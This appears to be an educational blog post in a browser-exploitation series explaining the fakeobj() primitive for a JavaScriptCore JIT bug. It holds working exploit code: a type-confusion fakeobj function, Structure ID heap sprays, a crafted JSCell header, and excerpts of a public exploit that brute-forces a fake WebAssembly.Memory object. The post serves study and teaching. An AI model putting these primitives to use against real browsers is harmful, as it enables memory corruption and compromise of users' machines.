The fakeobj() Primitive: Turning an Address Leak into a Memory Corruption

TLDR
In this video we introduce the fakeobj() primitive. It's based on the bug used in addrof() and allows us to corrupt the memory of internal JavaScriptCore objects.

Introduction

In the last blog post we saw how we can leak the address of a JavaScript object; now it's time to see if we can achieve a memory corruption. Before jumping into the code, it's crucial that you have a basic understanding of what a JavaScript object looks like in memory (with inline properties and the butterfly), because in this post we will use this knowledge to turn a memory leak into a memory corruption.

You might wonder how we can turn this memory leak into something that allows us to compromise the JavaScript engine. Well, it's not as easy as a simple buffer overflow where you get to control the instruction pointer directly. The bug we have here gives us some capabilities, but we need to do more to turn it into something powerful.

'fakeobj' Primitive

In saelo's article, he talks about two primitives - addrof and fakeobj. We've already used addrof to leak the address of an object in memory, so now let's look at the fakeobj one.

The fakeobj primitive works essentially the other way around.  Here we inject native doubles into an array of JSValues, allowing us to create JSObject pointers.

Remember from an earlier post that JSValues are 64-bit values whose upper 16 bits act as a type tag. A 32-bit integer, for example, is stored with the highest two bytes set to FFFF, as shown below.

Pointer {  0000:PPPP:PPPP:PPPP
         / 0001:****:****:****
Double  {         ...
         \ FFFE:****:****:****
Integer {  FFFF:0000:IIII:IIII

This is precisely how we found them in memory. However, when you add a JavaScript object to an array, the array stores a pointer, which is the address of that object. So if the addrof primitive uses this idea to read the pointer to an object as a double, can we also reverse it so that a double is interpreted as a pointer to an object? Well, that's precisely what we are going to do now.
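To make the tagging scheme a bit more concrete, here is a minimal sketch in plain JavaScript that classifies a raw 64-bit value by its top 16 bits, following the diagram above. The name classifyJSValue is made up for this illustration, and the sketch deliberately ignores special values such as null or undefined, which the diagram does not cover.

```javascript
// Hypothetical helper: classify a raw 64-bit JSValue (passed as a BigInt)
// by its top 16 bits, following the diagram above.
function classifyJSValue(bits) {
  const tag = bits >> 48n;                 // upper 16 bits
  if (tag === 0x0000n) return "pointer";   // 0000:PPPP:PPPP:PPPP
  if (tag === 0xffffn) return "integer";   // FFFF:0000:IIII:IIII
  return "double";                         // 0001 .. FFFE
}

console.log(classifyJSValue(0x000062d0000d4080n)); // "pointer" (an address-like example value)
console.log(classifyJSValue(0xffff000000000001n)); // "integer" (the integer 1)
```

The point to take away is that nothing but these tag bits tells the engine whether eight bytes are a number or an address, which is exactly what fakeobj is about to abuse.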

Let's copy the addrof code and start modifying it.

// 
// fakeobj primitive
// Numbers in the comments represent the points listed below the code.

function fakeobj(dbl) { // (1) & (2)
  var array = [13.37];
  var reg = /abc/y;
    
  // Target function
  var AddrSetter = function(array) { // (4)
    "abc".match(reg);
    array[0] = dbl; // (3)
  }
  
  // Force optimization
  for (var i = 0; i < 100000; ++i)
    AddrSetter(array);
  
  // Setup haxx
  regexLastIndex = {};
  regexLastIndex.toString = function() {
    array[0] = {};
    return "0";
  };
  reg.lastIndex = regexLastIndex;
  
  // Do it!
  AddrSetter(array);
  return array[0]; // (5)
}

Here is what changed:

  1. Changed the function name from addrof to fakeobj to match its primitive.
  2. Changed the name of the argument from val to dbl, which represents double.
  3. Instead of reading and returning the first value of the array as the double, we write to it.
  4. Changed the name of the function from AddrGetter to AddrSetter.
  5. Instead of returning the results of the old AddrGetter, we are just returning the first element of the array.

It all starts with an array of doubles, and we JIT the code that's responsible for writing a double of our choice into the first element of that array - nothing special, totally normal. Then we prepare the bug with the toString function and call the AddrSetter function again. This executes the RegEx, which calls toString and assigns an object to the first element of the array. Now the JavaScript engine converts the array of doubles into a contiguous array (an array of JSValues) and places a pointer to this new object into it. BUT the JIT-ed code still thinks that we have an array of doubles, so it writes a double of our choice into the first element, overwriting the pointer. If the double that overwrites the object address looks like a pointer, then JavaScript will think that the first element of the array points to an object. Let's try this.
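The confusion described above can be mimicked with a toy model in plain JavaScript. This is only a sketch and not how JavaScriptCore is implemented: the names jitStoreDouble and loadAsJSValue are invented, and a single 8-byte DataView stands in for the first array slot.

```javascript
// Toy model only: one 8-byte array slot that two code paths interpret differently.
const slot = new DataView(new ArrayBuffer(8));

// What the stale JIT code does for an array of doubles: store the raw IEEE-754 bits.
function jitStoreDouble(dbl) {
  slot.setFloat64(0, dbl, true);
}

// What the engine does once the array is contiguous: read the slot as a JSValue.
function loadAsJSValue() {
  const bits = slot.getBigUint64(0, true);
  return (bits >> 48n) === 0n
    ? "pointer to 0x" + bits.toString(16)
    : "not a pointer";
}

// Build a double whose raw bits look like an address (example value).
const scratch = new DataView(new ArrayBuffer(8));
scratch.setBigUint64(0, 0x62d0000d4080n, true);
const addressLikeDouble = scratch.getFloat64(0, true);

jitStoreDouble(addressLikeDouble);
console.log(loadAsJSValue()); // "pointer to 0x62d0000d4080"
jitStoreDouble(13.37);
console.log(loadAsJSValue()); // "not a pointer"
```

In the real engine the two interpretations come from the stale JIT code and the converted array, not from two helper functions, but the effect on the eight bytes in the slot is the same.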

The Fake Object

Let's try to craft an object, but first, let's run jsc with lldb attached to it and also let's run our JavaScript file in an interactive mode.

$ lldb ./jsc
(lldb) run -i ~/projects/webkit/test.js
Process 64142 launched: './jsc' (x86_64)
>>> 

Let's keep this simple and create an object with a single property x which is a simple integer.

>>> test = {}
[object Object]
>>> test.x = 1
1
>>> describe(test)
Object: 0x62d0000d4080 with butterfly 0x0 (Structure 0x62d000188310: [...])
# Hit CTRL + C
(lldb) x/4gx 0x62d0000d4080
0x62d0000d4080: 0x0100160000000126 0x0000000000000000
0x62d0000d4090: 0xffff000000000001 0x0000000000000000

Looking at the object, we see that the 0x0100160000000126 has some flags and the Structure ID, together they are a JSCell Header. Then we have a butterfly which is null (0x0), followed by the inline property x which we set to a 32-bit integer with the value of 1. Now keeping this in mind, let's try to fake such an object.
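As a rough illustration, the header value from the dump can be split into its fields with a few shifts. The field order used here (a 4-byte Structure ID followed by indexing type, cell type, flags and cell state, one byte each) is taken from the header bytes listed in the exploit code later in this post; treat it as an assumption about this particular JavaScriptCore build. decodeCellHeader is a made-up helper name.

```javascript
// Hypothetical helper: split a 64-bit JSCell header (BigInt) into its fields.
// Assumed layout, lowest byte first: structureID (4 bytes), indexingType,
// type, flags, cellState (1 byte each).
function decodeCellHeader(header) {
  return {
    structureID:  Number(header & 0xffffffffn),
    indexingType: Number((header >> 32n) & 0xffn),
    type:         Number((header >> 40n) & 0xffn),
    flags:        Number((header >> 48n) & 0xffn),
    cellState:    Number((header >> 56n) & 0xffn),
  };
}

const decoded = decodeCellHeader(0x0100160000000126n);
console.log(decoded.structureID.toString(16)); // "126"
console.log(decoded.type.toString(16));        // "16"
console.log(decoded.cellState);                // 1
```

So for our test object the Structure ID is 0x126, and everything above the lower 32 bits is flag and type information.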

One of the most clever parts of this exploit is that while faking objects, we can abuse the fact that the first few properties of an object are inlined and not placed into the butterfly. But first, let's see what such an object looks like in memory. Notice how the properties 1, 2, 3 show up?

>>> fake = {}
[object Object]
>>> fake.a = 1
1
>>> fake.b = 2
2
>>> fake.c = 3
3
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
# Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0xffff000000000001 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

Now let's just test our primitive. We can use addrof to get the address, and then we use fakeobj on this address. This means hax should now be the same object as fake.

>>> addrof(fake)
5.36780059573753e-310
>>> hax = fakeobj(5.36780059573753e-310)
[object Object]
>>> hax.a
1
>>> hax.b
2
>>> hax.c
3
>>> describe(hax)
Object: 0x62d0000d40c0 with butterfly 0x0 ...
>>> describe(fake)
Object: 0x62d0000d40c0 with butterfly 0x0 ...

Cool. We can get the address of the fake object and we can get back the fake object using our fakeobj primitive. But here comes the trick. We fully control the double that is interpreted as a pointer by the JavaScript engine. So what if we add a tiny bit (+0x10) to that double value, which is the address of the fake object, so that the pointer is shifted forward and points a bit further down in memory?


If we use the fakeobj function now, JavaScript will think that a JavaScript object lives at the new offset. In our case, though, the memory there doesn't look like a valid JavaScript object, because it's missing the flags, the butterfly and the inline properties. Since we control the inlined properties, we can try to craft a valid JavaScript object.

Let's start with the flags and the Structure ID. As you know, the Structure ID defines what kind of properties exist on an object. If we want to fake the test object with the property x from earlier, we need to use exactly the Structure ID of the test object.

Our test object looks like this

# Flags and Structure ID | Butterfly
0x0100160000000126 0x0000000000000000
0xffff000000000001 0x0000000000000000
# Inline property `x` with the value `1`

So we want to write a fake Structure ID that matches the real Structure ID into the first property. But since we don't have a handy function like describe in browsers, how are we supposed to read the Structure ID of the test object at run time? Well, we already know that we create a new structure and get a new Structure ID every time we add a new property to an object. So we can abuse this to spam structures and then guess a valid Structure ID.

We create a lot of these test objects with the property x but also an arbitrary other property to force new Structure IDs. Basically, we spray test objects.

for (var i=0; i<0x1000; i++) {
    test = {}
    test.x = 1
    test['prop_' + i] = 2
}
2
>>> describe(test)
Object: 0x62d00089d300 with butterfly 0x0 (Structure ...:[Object, {x:0, prop_4095:1} ...])

If we look at the last test object that was created, we see our x property and the other arbitrary property, but most importantly it has a huge Structure ID. So if we pick a Structure ID of, let's say, 0x1000, we can be fairly confident that it belongs to one of those test objects. Theoretically this could also fail, because that Structure ID might belong to some other object, but we can increase our odds by spraying more objects.

So now we want to craft the 64-bit value 0x0100160000001000, which combines the flags of the test object (0x01001600) with our guessed Structure ID (0x1000). Since we are going to be writing a double, let's convert this 64-bit integer to a double.

>>> # This is python, not the jsc interpreter
>>> import struct
>>> struct.pack("Q", 0x0100160000001000)
b'\x00\x10\x00\x00\x00\x16\x00\x01'
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000))
(7.330283319472755e-304,)

Now this double should be a valid JSCell header for our fake object and we can assign it to the property a.

>>> // this is javascript
>>> fake.a = 7.330283319472755e-304
7.330283319472755e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0101160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

However, as you can see, our value is messed up a bit. Carefully compare 0x0100160000001000 with 0x0101160000001000. There's an additional 1 in 0x0101160000001000 that shouldn't be there. This is due to the NaN-encoding for JSValues.

The scheme we have implemented encodes double precision values by performing a 64-bit integer addition of the value 2^48 to the number.

NaN-encoding for Doubles

So basically the engine will add 0x1000000000000, so we just gotta subtract this value.

>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x0100160000001000-0x1000000000000))
(7.082855106403439e-304,)
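The same adjustment can be sketched directly in JavaScript instead of Python. The helper names below (bitsToDouble, doubleToBits, doubleForRawBits) are made up for this example, and the code relies on BigInt and BigUint64Array, so it is meant for a current Node.js or browser console; the old jsc build used in this post may not support them.

```javascript
// Reinterpret between a 64-bit integer (BigInt) and a double via a shared buffer.
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

function bitsToDouble(bits) { u64[0] = bits; return f64[0]; }
function doubleToBits(dbl)  { f64[0] = dbl;  return u64[0]; }

// 2^48, the value the engine adds when it stores a double as a JSValue.
const DOUBLE_ENCODE_OFFSET = 1n << 48n;

// Hypothetical helper: the double we must assign so that the stored
// JSValue in memory ends up equal to `wanted`.
function doubleForRawBits(wanted) {
  return bitsToDouble(wanted - DOUBLE_ENCODE_OFFSET);
}

const headerDouble = doubleForRawBits(0x0100160000001000n);
console.log(headerDouble);
// Simulate the engine's encoding step and print what would land in memory.
console.log((doubleToBits(headerDouble) + DOUBLE_ENCODE_OFFSET).toString(16)); // "100160000001000"
```

Subtracting first and letting the engine add 2^48 back is what makes the stored bytes come out as the header we want.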

Now let's try again.

>>> // this is javascript
>>> fake.a = 7.082855106403439e-304
7.082855106403439e-304
>>> describe(fake)
Object: 0x62d0000d40c0
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0xffff000000000002
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

Now we have the right value 0x0100160000001000. Next, we have the butterfly, and we want this to be 0, but how can we do that if JavaScript adds ffff at the beginning of every integer? It's very simple: we set the property to some value and then delete it, which throws away everything and leaves 0x0 in the slot.

>>> fake.b = 2
2
>>> delete fake.b
true
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000003 0x0000000000000000

The third property of our fake object becomes the first property of our fake test object, so we can set it to anything we want. How about 1337?

>>> fake.c = 1337
1337
// Hit CTRL + C
(lldb) x/6gx 0x62d0000d40c0
0x62d0000d40c0: 0x0100160000000129 0x0000000000000000
0x62d0000d40d0: 0x0100160000001000 0x0000000000000000
0x62d0000d40e0: 0xffff000000000539 0x0000000000000000
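To double check how the two objects line up, here is a small sketch that computes where each inline property lives. It assumes the layout seen in the dumps above (header at +0x00, butterfly at +0x08, inline properties from +0x10 in 8-byte slots); inlineSlotAddress is a made-up helper name.

```javascript
// Assumed object layout, as seen in the memory dumps:
//   +0x00 JSCell header, +0x08 butterfly, +0x10 first inline property, 8 bytes per slot.
const INLINE_OFFSET = 0x10n;

// Hypothetical helper: address of the inline property with the given index.
function inlineSlotAddress(objectAddr, index) {
  return objectAddr + INLINE_OFFSET + 8n * BigInt(index);
}

const fakeAddr = 0x62d0000d40c0n;     // address of `fake` from describe()
const craftedAddr = fakeAddr + 0x10n; // where the crafted object will start

console.log(inlineSlotAddress(fakeAddr, 0) === craftedAddr);                       // true: fake.a is the crafted header
console.log(inlineSlotAddress(fakeAddr, 1) === craftedAddr + 0x08n);               // true: fake.b is the crafted butterfly
console.log(inlineSlotAddress(fakeAddr, 2) === inlineSlotAddress(craftedAddr, 0)); // true: fake.c is the crafted property x
```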

Now everything looks promising, so let's place all of this into our test.js script.

function fakeobj(dbl) {
    ...
}

for (var i=0; i<0x2000; i++) {
    test = {}
    test.x = 1
    test['prop_' + i] = 2
}

fake = {}
fake.a = 7.082855106403439e-304
fake.b = 2
fake.c = 1337
delete fake.b

print(addrof(fake)); // get the address of the fake object

Running this will spit out the usual address of the fake object.

(lldb) run
5.367800960505e-310
(lldb) x/6gx 0x62d0007de880
0x62d0007de880: 0x010016000000212a 0x0000000000000000
0x62d0007de890: 0x0100160000001000 0x0000000000000000
0x62d0007de8a0: 0xffff000000000539 0x0000000000000000

5.367800960505e-310 is 0x62d0007de880, but we want to shift the pointer 16 bytes (0x10) down, so let's use Python to do that.

>>> # This is python
>>> struct.unpack("d", struct.pack("Q", 0x62d0007de880 + 0x10))
(5.3678009605058e-310,)
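The shift can also be done in JavaScript itself, which is what a real exploit has to do since it cannot call out to Python. This is a minimal sketch assuming an engine with BigInt support (a current Node.js, for example); shiftAddress is a hypothetical helper, not something from the exploit.

```javascript
const buf = new ArrayBuffer(8);
const f64 = new Float64Array(buf);
const u64 = new BigUint64Array(buf);

// Hypothetical helper: add a byte offset to an address that is held as a double.
function shiftAddress(addrAsDouble, offset) {
  f64[0] = addrAsDouble;      // view the double's raw bits ...
  u64[0] += BigInt(offset);   // ... add the offset to them as an integer ...
  return f64[0];              // ... and hand the result back as a double
}

// Recreate the leaked address from the dump above as a double, then shift it.
u64[0] = 0x62d0007de880n;
const leaked = f64[0];
const shifted = shiftAddress(leaked, 0x10);

f64[0] = shifted;
console.log(u64[0].toString(16)); // "62d0007de890"
```

The returned double is what we would pass to fakeobj.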

Now let's use the fakeobj function to see if this created an object.

>>> // this is javascript
>>> hax = fakeobj(5.3678009605058e-310)
[object Object]
>>> hax.x
1337 // It works!
>>> describe(hax)
Object: 0x62d0007de890 with butterfly ...

There we go, we have an object at 0x62d0007de890, which means we made jsc think that hax is an object, while it is actually made up of the properties of our fake object. This means that changing a property on one affects the other.

>>> hax.x
1337
>>> fake.c = "LiveOverflow"
LiveOverflow
>>> hax.x
LiveOverflow

This might seem a bit useless to you, but imagine the power we have now. We can craft arbitrary JavaScript objects and control their internals down to the memory level. This is not yet code execution, but the question we should ask ourselves is:

What JavaScript object could we fake that increases our capabilities?

At this point we could go about doing some security research and try to find good objects, but since we are noobs and there are other awesome researchers out there who've asked this question and figured ways out, let's just go with them. So let's see what Linus does in his exploit.

Linus's way

  • In pwn.js, he sprays a bunch of Float64Array structures in the same way we did.
var structs = [];
for (var i = 0; i < 0x5000; i++) {
    var a = new Float64Array(1);
    a['prop' + i] = 1337;
    structs.push(a);
}
  • Then he also sprays a few WebAssembly.Memory objects and prepares some web assembly code.
for (var i = 0; i < 50; i++) {
    var a = new WebAssembly.Memory({inital: 0});
    a['prop' + i] = 1337;
    structs.push(a);
}
var webAssemblyCode = '\x00asm\x01\x00\x00\x00\x01\x0b\x02...';
var webAssemblyBuffer = str2ab(webAssemblyCode);
var webAssemblyModule = new WebAssembly.Module(webAssemblyBuffer);
  • He also sets up the JSCell header using Int64 from the Int64.js library, which was created by saelo and which we are going to ignore for now. Basically, it just creates a fake JSCell header value as we did with Python.
var jsCellHeader = new Int64([
    0x00, 0x50, 0x00, 0x00, // m_structureID
    0x0,                    // m_indexingType
    0x2c,                   // m_type
    0x08,                   // m_flags
    0x1                     // m_cellState
]);
  • Down below, he creates a new object called wasmBuffer and the first property is the jsCellHeader like the first property a of our fake object. He also creates a butterfly. However, later down the road, he deletes it.
var wasmBuffer = {
    jsCellHeader: jsCellHeader.asJSValue(),
    butterfly: null,
    vector: null,
    memory: null,
    deleteMe: null
};
  • Deletion of the butterfly, because he apparently wants it to be 0.
delete wasmBuffer.butterfly
  • Going down, we see our first addrof, which leaks the address of the wasmBuffer object as a double.
var wasmBufferRawAddr = addrof(wasmBuffer);
  • Now he shifts the pointer 16 bytes down by adding 0x10 to the original address, just like we did.
var wasmBufferAddr = Add(Int64.fromDouble(wasmBufferRawAddr), 16);
  • After that he uses the library code again to turn the address back into a double and then passes it to the fakeobj function.
var fakeWasmBuffer = fakeobj(wasmBufferAddr.asDouble());
  • Now he should get a fake Float64Array. But here's a trick. Remember that he sprayed the Float64Array first and then a bunch of WebAssembly.Memory objects in the first and the second step? Turns out he is not interested in the Float64Array at all.
  • The while loop checks whether the fakeWasmBuffer is not yet an instance of WebAssembly.Memory. But how does this make any sense when he deliberately chose a Structure ID to get a Float64Array? Well, he abuses the fact that the two objects overlap. The JSCell header of the fake wasmBuffer overlaps with the jsCellHeader property of the original wasmBuffer. When we changed the fake object's property with fake.c = "LiveOverflow", we saw that it directly changed the hax object as well. Here he keeps incrementing the jsCellHeader property of the wasmBuffer, which changes the real Structure ID of the fake wasmBuffer.
while (!(fakeWasmBuffer instanceof WebAssembly.Memory)) {
    jsCellHeader.assignAdd(jsCellHeader, Int64.One);
    wasmBuffer.jsCellHeader = jsCellHeader.asJSValue();
}
  • So in each iteration, he checks whether the fake wasmBuffer has turned into a WebAssembly.Memory object. Basically, he's bruteforcing the Structure IDs in a safe way until he gets a WebAssembly.Memory object. This is the reason why he sprayed many Float64Arrays first and only a few WebAssembly.Memory objects afterwards: spraying the float arrays is a fast way to create many Structure IDs, so he can be sure to land on a valid fake object, and the WebAssembly.Memory structures follow right after them.
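To see what the header bytes and the increment in the loop amount to, here is a sketch that packs the same eight bytes into a single 64-bit value with BigInt. It assumes the bytes are in little-endian order, as the field comments in the listing suggest, and packBytes is a made-up stand-in for illustration, not the Int64.js API.

```javascript
// Hypothetical helper: pack eight little-endian bytes into one 64-bit value (BigInt).
function packBytes(bytes) {
  let value = 0n;
  for (let i = bytes.length - 1; i >= 0; i--) {
    value = (value << 8n) | BigInt(bytes[i]);
  }
  return value;
}

let header = packBytes([
  0x00, 0x50, 0x00, 0x00, // m_structureID
  0x0,                    // m_indexingType
  0x2c,                   // m_type
  0x08,                   // m_flags
  0x1                     // m_cellState
]);
console.log(header.toString(16));                 // "1082c0000005000"

header += 1n;                                     // one step of the brute-force loop
console.log((header & 0xffffffffn).toString(16)); // "5001"
```

Because the Structure ID sits in the lowest four bytes, adding one to the whole 64-bit header simply moves on to the next Structure ID without touching the other fields.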

Of course, this is still not an arbitrary code execution, nor does it even try to explain how we get it, but we will slowly get there. We understood yet another crucial part.

Resources